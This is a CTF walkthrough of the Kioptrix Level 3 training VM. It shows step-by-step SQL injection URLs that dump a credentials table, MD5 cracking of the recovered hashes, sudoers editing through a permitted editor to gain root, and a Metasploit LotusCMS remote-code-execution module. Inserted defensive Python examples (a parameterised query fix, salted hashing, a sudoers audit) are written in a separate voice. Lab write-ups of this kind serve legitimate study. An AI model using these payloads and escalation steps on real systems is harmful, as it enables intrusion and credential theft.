CTF – Kioptrix Level 3 – Walkthrough step by step - Yeah Hub https://www.yeahhub.com/ctf-kioptrix-level-3-walkthrough/

CTF CHALLENGES

CTF – Kioptrix Level 3 – Walkthrough Step By Step

March 16, 2018 | H4ck0 | Comments Off

Kioptrix: Level 1.2 (Level 3) is the third VM of the Kioptrix series, which can be found here. The Kioptrix
VMs are intended for anyone who wants to start getting into pentesting or wants to pursue the OSCP
exam.

Download Link – http://www.kioptrix.com/dlvm/KVM3.rar

Size – 452MB

Start your Kioptrix 1.2 machine in VMware and run the netdiscover tool from your Kali Linux
machine.

You’ll get the complete list of all hosts attached to your network. In our case the target IP of the Kioptrix
machine is 192.168.36.131.

One important thing about this challenge: once you find the IP (the VM is a DHCP client, so it may
change), edit your hosts file and point kioptrix3.com to it.

There’s a web application involved, so to have everything displayed nicely and properly you really need to
do this.

Type the following command to edit the hosts file and add the lines below to it.

Command: gedit /etc/hosts

Once the hosts file is open, make sure it looks similar to this:

127.0.0.1 localhost
127.0.0.1 kali
192.168.36.131 kioptrix3.com

If you are using Windows, the hosts file path is C:\Windows\System32\drivers\etc\hosts.

Let’s run Nmap to see which ports/services are open on the running Kioptrix VM.

Command: nmap -sS -A -n 192.168.36.131

From the output above you can see that only ports 22 and 80 are open. Port 80 is served by Apache 2.2.8
(HTTP) and port 22 by OpenSSH 4.7p1 (SSH).

So let’s go ahead and browse to the website by entering the IP address of the machine in our browser,
i.e. http://192.168.36.131/.

It seems to be a dynamic application running on port 80 with one blog page and a login page.

Let’s start nikto to see whether we can find any misconfigurations and vulnerabilities.

Command: nikto -h 192.168.36.131

phpMyAdmin was the first thing that caught our attention at first glance: it is used for DB management
and is located at http://192.168.36.131/phpmyadmin/.

We’ll come back to phpMyAdmin later; first let’s explore the web application further. Under the Blog
page we found one more interesting link, i.e. http://kioptrix3.com/gallery

Click on “Ligoat Press Room”

After browsing that album page we saw that in one of the links we were able to sort the photos by
certain values.

The thing that really caught our eye here was the “id” parameter in the URL. So we attempted to inject
a single quote ( ' ) to see whether the application was vulnerable to SQL injection.

And YES! It’s vulnerable to SQL injection, because it throws the error:

“You have an error in SQL syntax, check the manual that corresponds to your MySQL server version for
the right syntax to use near '' order by parentid, sort, name' at line 1 Could not select category”

There is a very good SQL injection tutorial that we suggest you read before exploiting this application,
just so you have a decent understanding of what we are doing. Either way, we will try to explain as best
we can as we go along.

So your first step is to find the number of columns. The easiest way to do this is to append “order by”
followed by a column number and then “--” (a comment marker, so the remainder of the original query
is ignored). We increase the number until the query returns an error; the largest number the query still
accepts is the column count.

Our links should look like this:

http://kioptrix3.com/gallery/gallery.php?id=1 order by 1-- (No Error)
http://kioptrix3.com/gallery/gallery.php?id=1 order by 2-- (No Error)
http://kioptrix3.com/gallery/gallery.php?id=1 order by 3-- (No Error)
http://kioptrix3.com/gallery/gallery.php?id=1 order by 4-- (No Error)
http://kioptrix3.com/gallery/gallery.php?id=1 order by 5-- (No Error)
http://kioptrix3.com/gallery/gallery.php?id=1 order by 6-- (No Error)
http://kioptrix3.com/gallery/gallery.php?id=1 order by 7-- (Error – Unknown Column)

We keep going until the “Unknown column” error shows up. If the error appears at N, the query has
N-1 columns, because the page still rendered correctly for “order by N-1”. In this case the number of
columns is 6.

Finding Accessible Columns

Now that we have the number of columns we need to find out which column numbers we can read
information from. We do that by putting a minus sign in front of the “1” (so the original query matches
no row and only our injected row is displayed) and replacing “order by #” with “union all select” followed
by the column numbers.

Our link should look like this: http://kioptrix3.com/gallery/gallery.php?id=-1 union all select
1,2,3,4,5,6--

We should see some of the numbers rendered in the page.

Getting Database Version

We found that columns 2 and 3 are displayed in the page, so we will use them to get the database version
and other information such as the username. One thing every person should keep in mind: the more
information you have, the more powerful you will be.

Let’s take column 3; our link should look like this: http://kioptrix3.com/gallery/gallery.php?id=-1
union all select 1,@@version,database(),4,5,6--

In our case we got 5.0.51a-3ubuntu5.4, so we can continue to enumerate table names. If the MySQL
version is 5.0 or later, the information_schema database is available.

information_schema is just like an index of all databases.

Now we need to get the name of the table we want to access:

To do that we replace database() with group_concat(table_name), add “from information_schema.tables
where table_schema=database()” after the last column number, and put the “--” at the end.

The link should look like this: http://kioptrix3.com/gallery/gallery.php?id=-1 union select
1,2,group_concat(table_name),4,5,6 from information_schema.tables where
table_schema=database()--

Nice! We are now able to see all the tables stored in the database! The dev_accounts table looks really
promising, so let’s go ahead and see whether we can find out the columns contained in that table.

So our new URL is http://kioptrix3.com/gallery/gallery.php?id=-1 union select
1,group_concat(column_name),3,4,5,6 FROM information_schema.columns WHERE
table_name=CHAR(100, 101, 118, 95, 97, 99, 99, 111, 117, 110, 116, 115)--

The CHAR() section in the SQL query is actually the table name dev_accounts written as ASCII codes.
This needs to be done, otherwise the SQL query will fail.

Here we converted the text dev_accounts into ASCII codes with the help of the website
http://www.unit-conversion.info/texttools/ascii/ and appended “table_name=char(100, 101, 118, 95,
97, 99, 99, 111, 117, 110, 116, 115)--” to the URL.

Our final step is to get the data, since we now have the table name, column names, and database name.
We are after the columns named “username” and “password”.

Remove everything after the 1 and add “from dev_accounts--”, and replace
“group_concat(column_name)” with “group_concat(username,0x3a,password)”.

Here 0x3a is the ASCII code of a colon ( : ), so we can separate the username from the password. Our
final URL will be: http://kioptrix3.com/gallery/gallery.php?id=-1 union select
1,group_concat(username,0x3a,password),3,4,5,6 FROM dev_accounts--

And you’re done.

Alright! We got 2 usernames and password hashes.

dreg:0d3eccfb887aabd50f243b3f155c0f85, loneferret:5badcaf789d3d1d09794d8f021f40f0e
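Everything from the single-quote probe to the dev_accounts dump works because gallery.php splices the id parameter straight into its SQL string. The Python below is an added example, not code from the walkthrough or from the Kioptrix gallery itself: it reproduces that concatenation pattern against an in-memory SQLite table with six columns (table and column names are assumptions; the real schema is not shown on the page) and puts the hardened handler next to it, an integer check followed by a bound parameter. The page's own probes behave as described against the vulnerable handler and are rejected cleanly by the fixed one. SQLite's error text differs from MySQL's, but the pass/fail pattern is the same.

```python
import re
import sqlite3

# Constructed stand-in for the gallery database: a six-column table, so that
# "order by 7" fails exactly like the walkthrough's probe. Table and column
# names are assumptions; the real Kioptrix schema is not on the page.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE photos("
        "id INTEGER, name TEXT, parentid INTEGER, sort INTEGER, path TEXT, added TEXT)"
    )
    db.execute("INSERT INTO photos VALUES (1, 'Ligoat Press Room', 0, 1, 'press.jpg', '2018-03-16')")
    db.execute("INSERT INTO photos VALUES (2, 'cat', 0, 2, 'cat.jpg', '2018-03-16')")
    return db

def gallery_vulnerable(db, raw_id):
    """Mirrors the vulnerable pattern: the id parameter is concatenated into
    the query text, so anything after the number becomes SQL. The trailing
    'order by parentid, sort, name' is the fragment visible in the page's
    MySQL error message. Returns ('ok', rows) or ('error', message)."""
    sql = f"SELECT * FROM photos WHERE id={raw_id} ORDER BY parentid, sort, name"
    try:
        return "ok", db.execute(sql).fetchall()
    except sqlite3.Error as exc:
        return "error", str(exc)

def gallery_fixed(db, raw_id):
    """Hardened handler: reject anything that is not a plain integer before it
    gets near the database, then bind the value instead of formatting it.
    Binding alone already stops the injection; the type check additionally
    turns every probe into a clean, loggable application error."""
    if not isinstance(raw_id, str) or not re.fullmatch(r"-?\d+", raw_id.strip()):
        return "error", "id must be an integer"
    rows = db.execute(
        "SELECT * FROM photos WHERE id=? ORDER BY parentid, sort, name",
        (int(raw_id),),
    ).fetchall()
    return "ok", rows

# The values used in the walkthrough, exactly as they arrive in the id parameter.
PROBES = [
    "1",
    "1'",
    "1 order by 6--",
    "1 order by 7--",
    "-1 union all select 1,2,3,4,5,6--",
]

if __name__ == "__main__":
    db = make_db()
    for probe in PROBES:
        print(f"id={probe!r:40} vulnerable={gallery_vulnerable(db, probe)[0]:5} "
              f"fixed={gallery_fixed(db, probe)[0]}")
```

Run it and the contrast is the whole lesson: the vulnerable handler errors on the quote and on order by 7, accepts order by 6, and hands back the attacker's 1..6 row for the union, while the fixed handler returns the same single row for id=1 and the same integer error for every probe.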

You can also use a ready-made SQL exploitation tool for breaking into the DB, called sqlmap.

The next step is to crack the hashes with the help of an online MD5 lookup service (“MD5 Decrypter”).

For the hash 5badcaf789d3d1d09794d8f021f40f0e, the cracked plaintext is starwars

For 0d3eccfb887aabd50f243b3f155c0f85, the cracked plaintext is Mast3r

Furthermore, you can also use the “hash-identifier” tool to verify the hash type, whether it’s MD5, SHA1 or
any other.

To crack the hashes you can also use the hashcat tool, which is pre-installed on the Kali Linux machine.

Save both hash values in a text file named “hash.txt”.

Then run the following command to crack the hashes with hashcat.

Command: hashcat -m 0 hash.txt /usr/share/wordlists/rockyou.txt --force

(-m 0 selects hashcat’s raw MD5 mode.)

OK, nice! We got the real text behind these hashes.
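The reason these two hashes fall in seconds is that dev_accounts stores unsalted MD5: one precomputed table (or one rockyou pass) answers for every user at once. The Python below is an added example, not from the walkthrough. It first checks the two recovered values against a constructed six-word list standing in for rockyou.txt, then shows the storage format a defender should use instead: PBKDF2-HMAC-SHA256 with a per-user random salt and a constant-time comparison, where the same dictionary check has to be repeated per user and per salt. The helper names, record format and wordlist are my own.

```python
import hashlib
import hmac
import os

# The two username:hash pairs recovered from dev_accounts (values from the page).
RECOVERED = {
    "dreg": "0d3eccfb887aabd50f243b3f155c0f85",
    "loneferret": "5badcaf789d3d1d09794d8f021f40f0e",
}

# Constructed mini wordlist standing in for /usr/share/wordlists/rockyou.txt.
WORDLIST = ["password", "123456", "starwars", "letmein", "Mast3r", "qwerty"]

def md5_hex(word):
    return hashlib.md5(word.encode()).hexdigest()

def audit_unsalted_md5(stored, wordlist):
    """Returns {user: plaintext} for every account whose stored value is the
    plain MD5 of a wordlist entry. A single lookup table serves all users
    because nothing is salted: that is what makes hashcat -m 0 so cheap."""
    lookup = {md5_hex(w): w for w in wordlist}
    return {user: lookup[h] for user, h in stored.items() if h in lookup}

ITERATIONS = 600_000  # OWASP's published figure for PBKDF2-HMAC-SHA256

def hash_password(password, salt=None, iterations=ITERATIONS):
    """Salted, iterated hash in a self-describing 'algo$iters$salt$digest' form,
    so the parameters can be raised later without breaking old records."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${digest.hex()}"

def verify_password(stored, candidate):
    """Recompute with the stored salt and compare in constant time."""
    algo, iters, salt_hex, digest_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    recomputed = hashlib.pbkdf2_hmac(
        "sha256", candidate.encode(), bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(recomputed.hex(), digest_hex)

if __name__ == "__main__":
    print("unsalted MD5 audit:", audit_unsalted_md5(RECOVERED, WORDLIST))
    a = hash_password("starwars")
    b = hash_password("starwars")
    print("same password, different records:", a != b)
    print("verify:", verify_password(a, "starwars"), verify_password(a, "Mast3r"))
```

Two users choosing the same password now get two different records, so a hit on one user tells the attacker nothing about the other, and each guess costs ITERATIONS HMAC computations instead of one MD5.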

Let’s SSH into the Kioptrix machine with our newly found credentials for the user loneferret.

Command: ssh loneferret@192.168.36.131

Password: starwars

Okay, at this point we need to escalate our privileges to root! We already did some initial
reconnaissance of the Kioptrix machine via SSH and stumbled across the following.

The file CompanyPolicy.README seems to be an interesting file; let’s view its contents with the
help of the cat command.

It turned out that the user we were logged in as had sudo permission to run the ht text editor
(/usr/local/bin/ht). Since that lets us edit any file as root, we can attempt to edit the /etc/sudoers file
to elevate our privileges, so let’s do just that!

If for some reason you get an error when trying to run sudo ht, just export xterm-256color as your TERM
(export TERM=xterm-256color) as we did below.

We should see the editor open up like so.

From there press ALT+F, then use your arrow keys to navigate to Open and press Enter.

Once you choose Open, you will be prompted to enter a file name. Type in /etc/sudoers to open the
sudoers file for editing.

After the file is open, add /bin/sh right after /usr/local/bin/ht, and don’t forget the comma!

Once you’ve done that press ALT+F > Save, then CTRL+Z to exit.

Okay, let’s see whether our “exploit” worked!
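What made this escalation possible was a sudoers grant for an interactive editor: any command that can open and save an arbitrary file as root is equivalent to root, so the /bin/sh that gets appended only makes explicit what was already true. The script below is an added example, not part of the walkthrough, that parses sudoers-style user specs and flags such grants. The two excerpts are constructed to model the before/after state described above (the VM's real /etc/sudoers is not shown on the page), and the list of escape-capable commands is mine and deliberately short.

```python
import re

# Commands that let the invoking user read/write arbitrary files or spawn a
# shell once run through sudo. Constructed, deliberately short list; ht is the
# editor from the walkthrough.
SHELL_ESCAPES = {"ht", "vi", "vim", "nano", "less", "more", "sh", "bash", "dash", "zsh"}

# user  host=(runas) TAG: cmd, cmd ...   (plain user specs; aliases not handled)
SUDOERS_LINE = re.compile(
    r"^(?P<user>\S+)\s+(?P<hosts>\S+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z]+:\s*)*)"
    r"(?P<cmds>.+)$"
)

def parse_sudoers(text):
    """Returns a list of {'user', 'nopasswd', 'cmds'} for each user spec line.
    Comments, blank lines and Defaults lines are skipped."""
    entries = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line or line.startswith("Defaults"):
            continue
        m = SUDOERS_LINE.match(line)
        if not m:
            continue
        cmds = [c.strip() for c in m.group("cmds").split(",") if c.strip()]
        entries.append({
            "user": m.group("user"),
            "nopasswd": "NOPASSWD" in m.group("tags"),
            "cmds": cmds,
        })
    return entries

def risky_grants(text):
    """(user, command, nopasswd) for every grant of ALL or of an escape-capable
    command. Negated entries such as !/usr/bin/su take a permission away rather
    than granting one, so they are ignored."""
    findings = []
    for entry in parse_sudoers(text):
        for cmd in entry["cmds"]:
            if cmd.startswith("!"):
                continue
            binary = cmd.split()[0].rsplit("/", 1)[-1]
            if cmd == "ALL" or binary in SHELL_ESCAPES:
                findings.append((entry["user"], cmd, entry["nopasswd"]))
    return findings

# Constructed excerpts modelled on the walkthrough: the grant as found, and the
# same file after /bin/sh has been appended to it.
BEFORE = """\
# constructed sudoers excerpt
Defaults    env_reset
root        ALL=(ALL) ALL
loneferret  ALL=NOPASSWD: !/usr/bin/su, /usr/local/bin/ht
"""
AFTER = BEFORE.replace("/usr/local/bin/ht", "/usr/local/bin/ht, /bin/sh")

if __name__ == "__main__":
    for label, text in (("before", BEFORE), ("after", AFTER)):
        print(label)
        for user, cmd, nopasswd in risky_grants(text):
            print(f"  {user}: {cmd}{'  (NOPASSWD)' if nopasswd else ''}")
```

The point of running it on both excerpts is that the "before" state is already flagged: denying su while allowing an editor does not close the hole, and a periodic run of a check like this over /etc/sudoers (or over `sudo -l` output collected from hosts) catches the grant before, not after, the sudoers edit.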

Let’s go back to the phpMyAdmin section, which we found at http://192.168.36.131/phpmyadmin/

Try test as the username and leave the password field blank.

WOW! You’re logged in, but it only shows the information_schema database, which is of no use to us.

Now look at the login page accessible at http://192.168.36.131/index.php?system=Admin: we found
that it was using LotusCMS, which is vulnerable to the LotusCMS 3.0 eval() Remote Code Execution exploit.

Start the Metasploit Framework and use the following exploit:

Command: use exploit/multi/http/lcms_php_exec

Type show options to view more details about this exploit module.

Set the required parameters as shown below:

And finally type run to start the exploit and Bingo! 1 Shell Session has been opened.

Furthermore, type ls -l gallery to list the files in the gallery directory.

Here the interesting file is gconfig.php, which seems to be a database configuration file containing the
DB username and DB password.

Let’s open this file by typing cat gallery/gconfig.php in the same terminal.

OK, we’ve got the DB details; let’s try to log in with them via phpMyAdmin.

Now you have full access to the database, through which you can add/manage/delete any user.

Tagged ctf challenges, ctf kioptrix level 3, ctf kioptrix level 3 walkthrough, ctf writeups, kioptrix series, kioptrix walkthrough,
vulnhub challenge, vulnhub writeups, vulnhub walkthrough

H4ck0

Step by step hacking tutorials about wireless cracking, kali linux, metasploit, ethical
hacking, seo tips and tricks, malware analysis and scanning.
https://www.yeahhub.com/
